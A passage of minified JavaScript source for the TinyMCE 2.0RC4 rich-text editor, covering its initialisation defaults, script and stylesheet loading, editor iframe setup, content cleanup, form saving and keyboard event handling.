 function TinyMCE(){this.majorVersion="2";this.minorVersion="0RC4";this.releaseDate="2005-10-30";this.instances=new Array();this.stickyClassesLookup=new Array();this.windowArgs=new Array();this.loadedFiles=new Array();this.configs=new Array();this.currentConfig=0;this.eventHandlers=new Array();var ua=navigator.userAgent;this.isMSIE=(navigator.appName=="Microsoft Internet Explorer");this.isMSIE5=this.isMSIE&&(ua.indexOf('MSIE 5')!=-1);this.isMSIE5_0=this.isMSIE&&(ua.indexOf('MSIE 5.0')!=-1);this.isGecko=ua.indexOf('Gecko')!=-1;this.isGecko18=ua.indexOf('Gecko')!=-1&&ua.indexOf('rv:1.8')!=-1;this.isSafari=ua.indexOf('Safari')!=-1;this.isOpera=ua.indexOf('Opera')!=-1;this.isMac=ua.indexOf('Mac')!=-1;this.isNS7=ua.indexOf('Netscape/7')!=-1;this.isNS71=ua.indexOf('Netscape/7.1')!=-1;this.dialogCounter=0;if(this.isOpera){this.isMSIE=true;this.isGecko=false;this.isSafari=false;}this.idCounter=0;};TinyMCE.prototype.defParam=function(key,def_val){this.settings[key]=tinyMCE.getParam(key,def_val);};TinyMCE.prototype.init=function(settings){var theme;this.settings=settings;if(typeof(document.execCommand)=='undefined')return;if(!tinyMCE.baseURL){var elements=document.getElementsByTagName('script');for(var i=0;i<elements.length;i++){if(elements[i].src&&(elements[i].src.indexOf("tiny_mce.js")!=-1||elements[i].src.indexOf("tiny_mce_src.js")!=-1||elements[i].src.indexOf("tiny_mce_gzip.php")!=-1)){var src=elements[i].src;tinyMCE.srcMode=(src.indexOf('_src')!=-1)?'_src':'';src=src.substring(0,src.lastIndexOf('/'));tinyMCE.baseURL=src;break;}}}this.documentBasePath=document.location.href;if(this.documentBasePath.indexOf('?')!=-1)this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.indexOf('?'));this.documentURL=this.documentBasePath;this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.lastIndexOf('/'));if(tinyMCE.baseURL.indexOf('://')==-1&&tinyMCE.baseURL.charAt(0)!='/'){tinyMCE.baseURL=this.documentBasePath+"/"+tinyMCE.baseURL;}this.defParam("mode","none");this.defParam("theme","advanced");this.defParam("plugins","",true);this.defParam("language","en");this.defParam("docs_language",this.settings['language']);this.defParam("elements","");this.defParam("textarea_trigger","mce_editable");this.defParam("editor_selector","");this.defParam("editor_deselector","mceNoEditor");this.defParam("valid_elements","+a[id|style|rel|rev|charset|hreflang|dir|lang|tabindex|accesskey|type|name|href|target|title|class|onfocus|onblur|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup],-strong/b[class|style],-em/i[class|style],-strike[class|style],-u[class|style],+p[style|dir|class|align],-ol[class|style],-ul[class|style],-li[class|style],br,img[id|dir|lang|longdesc|usemap|style|class|src|onmouseover|onmouseout|border=0|alt|title|hspace|vspace|width|height|align],-sub[style|class],-sup[style|class],-blockquote[dir|style],-table[border=0|cellspacing|cellpadding|width|height|class|align|summary|style|dir|id|lang|bgcolor|background|bordercolor],-tr[id|lang|dir|class|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor],tbody[id|class],thead[id|class],tfoot[id|class],-td[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor|scope],-th[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|scope],caption[id|lang|dir|class|style],-div[id|dir|class|align|style],-span[style|class|align],-pre[class|align|style],address[class|align|style],-h1[style|dir|class|align],-h2[style|dir|class|align],-h3[style|dir|class|align],-h4[style|dir|class|align],-h5[style|dir|class|align],-h6[style|dir|class|align],hr[class|style],font[face|size|style|id|class|dir|color]");this.defParam("extended_valid_elements","");this.defParam("invalid_elements","");this.defParam("encoding","");this.defParam("urlconverter_callback",tinyMCE.getParam("urlconvertor_callback","TinyMCE.prototype.convertURL"));this.defParam("save_callback","");this.defParam("debug",false);this.defParam("force_br_newlines",false);this.defParam("force_p_newlines",true);this.defParam("add_form_submit_trigger",true);this.defParam("relative_urls",true);this.defParam("remove_script_host",true);this.defParam("focus_alert",true);this.defParam("document_base_url",this.documentURL);this.defParam("visual",true);this.defParam("visual_table_class","mceVisualAid");this.defParam("setupcontent_callback","");this.defParam("fix_content_duplication",true);this.defParam("custom_undo_redo",true);this.defParam("custom_undo_redo_levels",-1);this.defParam("custom_undo_redo_keyboard_shortcuts",true);this.defParam("verify_css_classes",false);this.defParam("verify_html",true);this.defParam("apply_source_formatting",false);this.defParam("directionality","ltr");this.defParam("cleanup_on_startup",false);this.defParam("inline_styles",false);this.defParam("convert_newlines_to_brs",false);this.defParam("auto_reset_designmode",true);this.defParam("entities","160,nbsp,38,amp,34,quot,162,cent,8364,euro,163,pound,165,yen,169,copy,174,reg,8482,trade,8240,permil,181,micro,183,middot,8226,bull,8230,hellip,8242,prime,8243,Prime,167,sect,182,para,223,szlig,8249,lsaquo,8250,rsaquo,171,laquo,187,raquo,8216,lsquo,8217,rsquo,8220,ldquo,8221,rdquo,8218,sbquo,8222,bdquo,60,lt,62,gt,8804,le,8805,ge,8211,ndash,8212,mdash,175,macr,8254,oline,164,curren,166,brvbar,168,uml,161,iexcl,191,iquest,710,circ,732,tilde,176,deg,8722,minus,177,plusmn,247,divide,8260,frasl,215,times,185,sup1,178,sup2,179,sup3,188,frac14,189,frac12,190,frac34,402,fnof,8747,int,8721,sum,8734,infin,8730,radic,8764,sim,8773,cong,8776,asymp,8800,ne,8801,equiv,8712,isin,8713,notin,8715,ni,8719,prod,8743,and,8744,or,172,not,8745,cap,8746,cup,8706,part,8704,forall,8707,exist,8709,empty,8711,nabla,8727,lowast,8733,prop,8736,ang,180,acute,184,cedil,170,ordf,186,ordm,8224,dagger,8225,Dagger,192,Agrave,194,Acirc,195,Atilde,196,Auml,197,Aring,198,AElig,199,Ccedil,200,Egrave,202,Ecirc,203,Euml,204,Igrave,206,Icirc,207,Iuml,208,ETH,209,Ntilde,210,Ograve,212,Ocirc,213,Otilde,214,Ouml,216,Oslash,338,OElig,217,Ugrave,219,Ucirc,220,Uuml,376,Yuml,222,THORN,224,agrave,226,acirc,227,atilde,228,auml,229,aring,230,aelig,231,ccedil,232,egrave,234,ecirc,235,euml,236,igrave,238,icirc,239,iuml,240,eth,241,ntilde,242,ograve,244,ocirc,245,otilde,246,ouml,248,oslash,339,oelig,249,ugrave,251,ucirc,252,uuml,254,thorn,255,yuml,914,Beta,915,Gamma,916,Delta,917,Epsilon,918,Zeta,919,Eta,920,Theta,921,Iota,922,Kappa,923,Lambda,924,Mu,925,Nu,926,Xi,927,Omicron,928,Pi,929,Rho,931,Sigma,932,Tau,933,Upsilon,934,Phi,935,Chi,936,Psi,937,Omega,945,alpha,946,beta,947,gamma,948,delta,949,epsilon,950,zeta,951,eta,952,theta,953,iota,954,kappa,955,lambda,956,mu,957,nu,958,xi,959,omicron,960,pi,961,rho,962,sigmaf,963,sigma,964,tau,965,upsilon,966,phi,967,chi,968,psi,969,omega,8501,alefsym,982,piv,8476,real,977,thetasym,978,upsih,8472,weierp,8465,image,8592,larr,8593,uarr,8594,rarr,8595,darr,8596,harr,8629,crarr,8656,lArr,8657,uArr,8658,rArr,8659,dArr,8660,hArr,8756,there4,8834,sub,8835,sup,8836,nsub,8838,sube,8839,supe,8853,oplus,8855,otimes,8869,perp,8901,sdot,8968,lceil,8969,rceil,8970,lfloor,8971,rfloor,9001,lang,9002,rang,9674,loz,9824,spades,9827,clubs,9829,hearts,9830,diams,8194,ensp,8195,emsp,8201,thinsp,8204,zwnj,8205,zwj,8206,lrm,8207,rlm,173,shy,233,eacute,237,iacute,243,oacute,250,uacute,193,Aacute,225,aacute,201,Eacute,205,Iacute,211,Oacute,218,Uacute,221,Yacute,253,yacute");this.defParam("entity_encoding","named");this.defParam("cleanup_callback","");this.defParam("add_unload_trigger",true);this.defParam("ask",false);this.defParam("nowrap",false);this.defParam("auto_resize",false);this.defParam("auto_focus",false);this.defParam("cleanup",true);this.defParam("remove_linebreaks",true);this.defParam("button_tile_map",false);this.defParam("submit_patch",true);this.defParam("browsers","msie,safari,gecko,opera");this.defParam("dialog_type","window");this.defParam("accessibility_warnings",true);this.defParam("merge_styles_invalid_parents","");this.defParam("force_hex_style_colors",true);this.defParam("trim_span_elements",true);this.defParam("convert_fonts_to_spans",false);this.defParam("doctype",'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">');this.defParam("font_size_classes",'');this.defParam("font_size_style_values",'xx-small,x-small,small,medium,large,x-large,xx-large');this.defParam("event_elements",'a,img');if(this.isMSIE&&this.settings['browsers'].indexOf('msie')==-1)return;if(this.isGecko&&this.settings['browsers'].indexOf('gecko')==-1)return;if(this.isSafari&&this.settings['browsers'].indexOf('safari')==-1)return;if(this.isOpera&&this.settings['browsers'].indexOf('opera')==-1)return;var baseHREF=tinyMCE.settings['document_base_url'];if(baseHREF.indexOf('?')!=-1)baseHREF=baseHREF.substring(0,baseHREF.indexOf('?'));this.settings['base_href']=baseHREF.substring(0,baseHREF.lastIndexOf('/'))+"/";theme=this.settings['theme'];this.blockRegExp=new RegExp("^(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|blockquote|center|dl|dir|fieldset|form|noscript|noframes|menu|isindex)$","i");this.posKeyCodes=new Array(13,45,36,35,33,34,37,38,39,40);this.uniqueURL='http://tinymce.moxiecode.cp/mce_temp_url';this.settings['theme_href']=tinyMCE.baseURL+"/themes/"+theme;if(!tinyMCE.isMSIE)this.settings['force_br_newlines']=false;if(tinyMCE.getParam("content_css",false)){var cssPath=tinyMCE.getParam("content_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['content_css']=this.documentBasePath+"/"+cssPath;else this.settings['content_css']=cssPath;}else this.settings['content_css']='';if(tinyMCE.getParam("popups_css",false)){var cssPath=tinyMCE.getParam("popups_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['popups_css']=this.documentBasePath+"/"+cssPath;else this.settings['popups_css']=cssPath;}else this.settings['popups_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_popup.css";if(tinyMCE.getParam("editor_css",false)){var cssPath=tinyMCE.getParam("editor_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['editor_css']=this.documentBasePath+"/"+cssPath;else this.settings['editor_css']=cssPath;}else this.settings['editor_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_ui.css";if(tinyMCE.settings['debug']){var msg="Debug: \n";msg+="baseURL: "+this.baseURL+"\n";msg+="documentBasePath: "+this.documentBasePath+"\n";msg+="content_css: "+this.settings['content_css']+"\n";msg+="popups_css: "+this.settings['popups_css']+"\n";msg+="editor_css: "+this.settings['editor_css']+"\n";alert(msg);}this._initCleanup();if(this.configs.length==0){if(this.isSafari&&this.getParam('safari_warning',true))alert("Safari support is very limited and should be considered experimental.\nSo there is no need to even submit bugreports on this early version.\nYou can disable this message by setting: safari_warning option to false");tinyMCE.addEvent(window,"load",TinyMCE.prototype.onLoad);if(tinyMCE.isMSIE){if(tinyMCE.settings['add_unload_trigger']){tinyMCE.addEvent(window,"unload",TinyMCE.prototype.unloadHandler);tinyMCE.addEvent(window.document,"beforeunload",TinyMCE.prototype.unloadHandler);}}else{if(tinyMCE.settings['add_unload_trigger'])tinyMCE.addEvent(window,"unload",function(){tinyMCE.triggerSave(true,true);});}}this.loadScript(tinyMCE.baseURL+'/themes/'+this.settings['theme']+'/editor_template'+tinyMCE.srcMode+'.js');this.loadScript(tinyMCE.baseURL+'/langs/'+this.settings['language']+'.js');this.loadCSS(this.settings['editor_css']);var themePlugins=tinyMCE.getParam('plugins','',true,',');if(this.settings['plugins']!=''){for(var i=0;i<themePlugins.length;i++)this.loadScript(tinyMCE.baseURL+'/plugins/'+themePlugins[i]+'/editor_plugin'+tinyMCE.srcMode+'.js');}settings['index']=this.configs.length;this.configs[this.configs.length]=settings;};TinyMCE.prototype.loadScript=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<sc'+'ript language="javascript" type="text/javascript" src="'+url+'"></script>');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.loadCSS=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<link href="'+url+'" rel="stylesheet" type="text/css" />');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.importCSS=function(doc,css_file){if(css_file=='')return;if(typeof(doc.createStyleSheet)=="undefined"){var elm=doc.createElement("link");elm.rel="stylesheet";elm.href=css_file;if((headArr=doc.getElementsByTagName("head"))!=null&&headArr.length>0)headArr[0].appendChild(elm);}else var styleSheet=doc.createStyleSheet(css_file);};TinyMCE.prototype.confirmAdd=function(e,settings){var elm=tinyMCE.isMSIE?event.srcElement:e.target;var elementId=elm.name?elm.name:elm.id;tinyMCE.settings=settings;if(!elm.getAttribute('mce_noask')&&confirm(tinyMCELang['lang_edit_confirm']))tinyMCE.addMCEControl(elm,elementId);elm.setAttribute('mce_noask','true');};TinyMCE.prototype.updateContent=function(form_element_name){var formElement=document.getElementById(form_element_name);for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();if(inst.formElement==formElement){var doc=inst.getDoc();tinyMCE._setHTML(doc,inst.formElement.value);if(!tinyMCE.isMSIE)doc.body.innerHTML=tinyMCE._cleanupHTML(inst,doc,this.settings,doc.body,inst.visualAid);}}};TinyMCE.prototype.addMCEControl=function(replace_element,form_element_name,target_document){var id="mce_editor_"+tinyMCE.idCounter++;var inst=new TinyMCEControl(tinyMCE.settings);inst.editorId=id;this.instances[id]=inst;inst.onAdd(replace_element,form_element_name,target_document);};TinyMCE.prototype.triggerSave=function(skip_cleanup,skip_callback){for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();tinyMCE.settings['preformatted']=false;if(typeof(skip_cleanup)=="undefined")skip_cleanup=false;if(typeof(skip_callback)=="undefined")skip_callback=false;tinyMCE._setHTML(inst.getDoc(),inst.getBody().innerHTML);if(inst.settings['cleanup']==false){tinyMCE.handleVisualAid(inst.getBody(),true,false,inst);tinyMCE._setEventsEnabled(inst.getBody(),true);}tinyMCE._customCleanup(inst,"submit_content_dom",inst.contentWindow.document.body);var htm=skip_cleanup?inst.getBody().innerHTML:tinyMCE._cleanupHTML(inst,inst.getDoc(),this.settings,inst.getBody(),this.visualAid,true);htm=tinyMCE._customCleanup(inst,"submit_content",htm);if(tinyMCE.settings["encoding"]=="xml"||tinyMCE.settings["encoding"]=="html")htm=tinyMCE.convertStringToXML(htm);if(!skip_callback&&tinyMCE.settings['save_callback']!="")var content=eval(tinyMCE.settings['save_callback']+"(inst.formTargetElementId,htm,inst.getBody());");if((typeof(content)!="undefined")&&content!=null)htm=content;htm=tinyMCE.regexpReplace(htm,"&#40;","(","gi");htm=tinyMCE.regexpReplace(htm,"&#41;",")","gi");htm=tinyMCE.regexpReplace(htm,"&#59;",";","gi");htm=tinyMCE.regexpReplace(htm,"&#34;","&quot;","gi");htm=tinyMCE.regexpReplace(htm,"&#94;","^","gi");if(inst.formElement)inst.formElement.value=htm;}};TinyMCE.prototype._setEventsEnabled=function(node,state){var events=new Array('onfocus','onblur','onclick','ondblclick','onmousedown','onmouseup','onmouseover','onmousemove','onmouseout','onkeypress','onkeydown','onkeydown','onkeyup');var evs=tinyMCE.settings['event_elements'].split(',');for(var y=0;y<evs.length;y++){var elms=node.getElementsByTagName(evs[y]);for(var i=0;i<elms.length;i++){var event="";for(var x=0;x<events.length;x++){if((event=tinyMCE.getAttrib(elms[i],events[x]))!=''){event=tinyMCE.cleanupEventStr(""+event);if(!state)event="return true;"+event;else event=event.replace(/^return true;/gi,'');elms[i].removeAttribute(events[x]);elms[i].setAttribute(events[x],event);}}}}};TinyMCE.prototype.resetForm=function(form_index){var formObj=document.forms[form_index];for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();for(var i=0;i<formObj.elements.length;i++){if(inst.formTargetElementId==formObj.elements[i].name){inst.getBody().innerHTML=formObj.elements[i].value;return;}}}};TinyMCE.prototype.execInstanceCommand=function(editor_id,command,user_interface,value,focus){var inst=tinyMCE.getInstanceById(editor_id);if(inst){if(typeof(focus)=="undefined")focus=true;if(focus)inst.contentWindow.focus();inst.autoResetDesignMode();this.selectedElement=inst.getFocusElement();this.selectedInstance=inst;tinyMCE.execCommand(command,user_interface,value);if(tinyMCE.isMSIE&&window.event!=null)tinyMCE.cancelEvent(window.event);}};TinyMCE.prototype.execCommand=function(command,user_interface,value){user_interface=user_interface?user_interface:false;value=value?value:null;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();switch(command){case 'mceHelp':var template=new Array();template['file']='about.htm';template['width']=480;template['height']=380;tinyMCE.openWindow(template,{tinymce_version:tinyMCE.majorVersion+"."+tinyMCE.minorVersion,tinymce_releasedate:tinyMCE.releaseDate,inline:"yes"});return;case 'mceFocus':var inst=tinyMCE.getInstanceById(value);if(inst)inst.contentWindow.focus();return;case "mceAddControl":case "mceAddEditor":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value);return;case "mceAddFrameControl":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value['element'],value['document']);return;case "mceRemoveControl":case "mceRemoveEditor":tinyMCE.removeMCEControl(value);return;case "mceResetDesignMode":if(!tinyMCE.isMSIE){for(var n in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[n]))continue;try{tinyMCE.instances[n].getDoc().designMode="on";}catch(e){}}}return;}if(this.selectedInstance){this.selectedInstance.execCommand(command,user_interface,value);}else if(tinyMCE.settings['focus_alert'])alert(tinyMCELang['lang_focus_alert']);};TinyMCE.prototype.eventPatch=function(editor_id){if(typeof(tinyMCE)=="undefined")return true;for(var i=0;i<document.frames.length;i++){try{if(document.frames[i].event){var event=document.frames[i].event;if(!event.target)event.target=event.srcElement;TinyMCE.prototype.handleEvent(event);return;}}catch(ex){}}};TinyMCE.prototype.unloadHandler=function(){tinyMCE.triggerSave(true,true);};TinyMCE.prototype.addEventHandlers=function(editor_id){if(tinyMCE.isMSIE){var doc=document.frames[editor_id].document;tinyMCE.addEvent(doc,"keypress",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keyup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keydown",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"mouseup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"click",TinyMCE.prototype.eventPatch);}else{var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();inst.switchSettings();tinyMCE.addEvent(doc,"keypress",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keydown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keyup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"click",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mouseup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mousedown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"focus",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"blur",tinyMCE.handleEvent);eval('try { doc.designMode = "On"; } catch(e) {}');}};TinyMCE.prototype._createIFrame=function(replace_element){var iframe=document.createElement("iframe");var id=replace_element.getAttribute("id");var aw,ah;aw=""+tinyMCE.settings['area_width'];ah=""+tinyMCE.settings['area_height'];if(aw.indexOf('%')==-1){aw=parseInt(aw);aw=aw<0?300:aw;aw=aw+"px";}if(ah.indexOf('%')==-1){ah=parseInt(ah);ah=ah<0?240:ah;ah=ah+"px";}iframe.setAttribute("id",id);iframe.setAttribute("border","0");iframe.setAttribute("frameBorder","0");iframe.setAttribute("marginWidth","0");iframe.setAttribute("marginHeight","0");iframe.setAttribute("leftMargin","0");iframe.setAttribute("topMargin","0");iframe.setAttribute("width",aw);iframe.setAttribute("height",ah);iframe.setAttribute("allowtransparency","true");if(tinyMCE.settings["auto_resize"])iframe.setAttribute("scrolling","no");if(tinyMCE.isMSIE&&!tinyMCE.isOpera)iframe.setAttribute("src",this.settings['default_document']);iframe.style.width=aw;iframe.style.height=ah;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)replace_element.outerHTML=iframe.outerHTML;else replace_element.parentNode.replaceChild(iframe,replace_element);if(tinyMCE.isMSIE)return window.frames[id];else return iframe;};TinyMCE.prototype.setupContent=function(editor_id){var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();var head=doc.getElementsByTagName('head').item(0);var content=inst.startContent;tinyMCE.operaOpacityCounter=100*tinyMCE.idCounter;inst.switchSettings();if(!tinyMCE.isMSIE&&doc.title!="blank_page"){try{doc.location.href=tinyMCE.baseURL+"/blank.htm";}catch(ex){}window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",1000);return;}if(!head){window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",10);return;}tinyMCE.importCSS(inst.getDoc(),tinyMCE.baseURL+"/themes/"+inst.settings['theme']+"/css/editor_content.css");tinyMCE.importCSS(inst.getDoc(),inst.settings['content_css']);tinyMCE.executeCallback('init_instance_callback','_initInstance',0,inst);if(tinyMCE.getParam("convert_fonts_to_spans"))inst.getDoc().body.setAttribute('id','mceSpanFonts');if(tinyMCE.settings['nowrap'])doc.body.style.whiteSpace="nowrap";doc.body.dir=this.settings['directionality'];doc.editorId=editor_id;if(!tinyMCE.isMSIE)doc.documentElement.editorId=editor_id;var base=doc.createElement("base");base.setAttribute('href',tinyMCE.settings['base_href']);head.appendChild(base);if(tinyMCE.settings['convert_newlines_to_brs']){content=tinyMCE.regexpReplace(content,"\r\n","<br />","gi");content=tinyMCE.regexpReplace(content,"\r","<br />","gi");content=tinyMCE.regexpReplace(content,"\n","<br />","gi");}content=tinyMCE._customCleanup(inst,"insert_to_editor",content);if(tinyMCE.isMSIE){window.setInterval('try{tinyMCE.getCSSClasses(document.frames["'+editor_id+'"].document, "'+editor_id+'");}catch(e){}',500);if(tinyMCE.settings["force_br_newlines"])document.frames[editor_id].document.styleSheets[0].addRule("p","margin: 0px;");var body=document.frames[editor_id].document.body;tinyMCE.addEvent(body,"beforepaste",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(body,"beforecut",TinyMCE.prototype.eventPatch);body.editorId=editor_id;}content=tinyMCE.cleanupHTMLCode(content);if(!tinyMCE.isMSIE){var contentElement=inst.getDoc().createElement("body");var doc=inst.getDoc();contentElement.innerHTML=content;if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt'])content=content.replace(new RegExp('&lt;&gt;','g'),"");if(tinyMCE.settings['cleanup_on_startup'])tinyMCE.setInnerHTML(inst.getBody(),tinyMCE._cleanupHTML(inst,doc,this.settings,contentElement));else{content=tinyMCE.regexpReplace(content,"<strong","<b","gi");content=tinyMCE.regexpReplace(content,"<em(/?)>","<i$1>","gi");content=tinyMCE.regexpReplace(content,"<em ","<i ","gi");content=tinyMCE.regexpReplace(content,"</strong>","</b>","gi");content=tinyMCE.regexpReplace(content,"</em>","</i>","gi");tinyMCE.setInnerHTML(inst.getBody(),content);}inst.convertAllRelativeURLs();}else{if(tinyMCE.settings['cleanup_on_startup']){tinyMCE._setHTML(inst.getDoc(),content);eval('try {tinyMCE.setInnerHTML(inst.getBody(), tinyMCE._cleanupHTML(inst, inst.contentDocument, this.settings, inst.getBody());} catch(e) {}');}else tinyMCE._setHTML(inst.getDoc(),content);}var parentElm=document.getElementById(inst.editorId+'_parent');if(parentElm.lastChild.nodeName.toLowerCase()=="input")inst.formElement=parentElm.lastChild;else inst.formElement=parentElm.nextSibling;tinyMCE.handleVisualAid(inst.getBody(),true,tinyMCE.settings['visual'],inst);tinyMCE.executeCallback('setupcontent_callback','_setupContent',0,editor_id,inst.getBody(),inst.getDoc());if(!tinyMCE.isMSIE)TinyMCE.prototype.addEventHandlers(editor_id);if(tinyMCE.isMSIE)tinyMCE.addEvent(inst.getBody(),"blur",TinyMCE.prototype.eventPatch);tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=inst.contentWindow.document.body;tinyMCE.triggerNodeChange(false,true);tinyMCE._customCleanup(inst,"insert_to_editor_dom",inst.getBody());tinyMCE._customCleanup(inst,"setup_content_dom",inst.getBody());tinyMCE._setEventsEnabled(inst.getBody(),false);tinyMCE.cleanupAnchors(inst.getDoc());if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(inst.getDoc());inst.startContent=tinyMCE.trim(inst.getBody().innerHTML);inst.undoLevels[inst.undoLevels.length]=inst.startContent;tinyMCE.operaOpacityCounter=-1;};TinyMCE.prototype.cleanupHTMLCode=function(s){s=s.replace(/<p\/>/gi,'<p>&nbsp;</p>');s=s.replace(/<p>\s*<\/p>/gi,'<p>&nbsp;</p>');s=s.replace(/<(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|b|em|strong|i|strike|u|span|a|ul|ol|li|blockquote)([^\\|>]*?)\/>/gi,'<$1$2></$1>');s=s.replace(new RegExp('\\s+></','gi'),'></');if(tinyMCE.isMSIE)s=s.replace(/<p><hr\/><\/p>/gi,"<hr>");s=s.replace(new RegExp('(href=\"?)(\\s*?#)','gi'),'$1'+tinyMCE.settings['document_base_url']+"#");return s;};TinyMCE.prototype.cancelEvent=function(e){if(tinyMCE.isMSIE){e.returnValue=false;e.cancelBubble=true;}else e.preventDefault();};TinyMCE.prototype.removeTinyMCEFormElements=function(form_obj){for(var i=0;i<form_obj.elements.length;i++){var elementId=form_obj.elements[i].name?form_obj.elements[i].name:form_obj.elements[i].id;if(elementId.indexOf('mce_editor_')==0)form_obj.elements[i].disabled=true;}};TinyMCE.prototype.accessibleEventHandler=function(e){var win=this._win;e=tinyMCE.isMSIE?win.event:e;var elm=tinyMCE.isMSIE?e.srcElement:e.target;if(elm.nodeName=="SELECT"&&!elm.oldonchange){elm.oldonchange=elm.onchange;elm.onchange=null;}if(e.keyCode==13||e.keyCode==32){elm.onchange=elm.oldonchange;elm.onchange();elm.oldonchange=null;tinyMCE.cancelEvent(e);}};TinyMCE.prototype.addSelectAccessibility=function(e,select,win){if(!select._isAccessible){select.onkeydown=tinyMCE.accessibleEventHandler;select._isAccessible=true;select._win=win;}};TinyMCE.prototype.handleEvent=function(e){if(typeof(tinyMCE)=="undefined")return true;switch(e.type){case "blur":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.execCommand('mceEndTyping');return;case "submit":tinyMCE.removeTinyMCEFormElements(tinyMCE.isMSIE?window.event.srcElement:e.target);tinyMCE.triggerSave();tinyMCE.isNotDirty=true;return;case "reset":var formObj=tinyMCE.isMSIE?window.event.srcElement:e.target;for(var i=0;i<document.forms.length;i++){if(document.forms[i]==formObj)window.setTimeout('tinyMCE.resetForm('+i+');',10);}return;case "keypress":if(e.target.editorId){tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];}else{if(e.target.ownerDocument.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.ownerDocument.editorId];}if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&e.keyCode==13&&!e.shiftKey){if(tinyMCE.selectedInstance._insertPara(e)){tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.cancelEvent(e);return false;}}if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}if(tinyMCE.isGecko&&(e.ctrlKey&&!e.altKey)&&tinyMCE.settings['custom_undo_redo']){if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.charCode==122){tinyMCE.selectedInstance.execCommand("Undo");e.preventDefault();return false;}if(e.charCode==121){tinyMCE.selectedInstance.execCommand("Redo");e.preventDefault();return false;}}if(e.charCode==98){tinyMCE.selectedInstance.execCommand("Bold");e.preventDefault();return false;}if(e.charCode==105){tinyMCE.selectedInstance.execCommand("Italic");e.preventDefault();return false;}if(e.charCode==117){tinyMCE.selectedInstance.execCommand("Underline");e.preventDefault();return false;}}if(tinyMCE.isMSIE&&tinyMCE.settings['force_br_newlines']&&e.keyCode==13){if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.selectedInstance){var sel=tinyMCE.selectedInstance.getDoc().selection;var rng=sel.createRange();if(tinyMCE.getParentElement(rng.parentElement(),"li")!=null)return false;e.returnValue=false;e.cancelBubble=true;rng.pasteHTML("<br />");rng.collapse(false);rng.select();tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.triggerNodeChange(false);return false;}}if(e.keyCode==8||e.keyCode==46){tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(e.target,"a");tinyMCE.imgElement=tinyMCE.getParentElement(e.target,"img");tinyMCE.triggerNodeChange(false);}return false;break;case "keyup":case "keydown":if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];else return;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var inst=tinyMCE.selectedInstance;if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}tinyMCE.selectedElement=null;tinyMCE.selectedNode=null;var 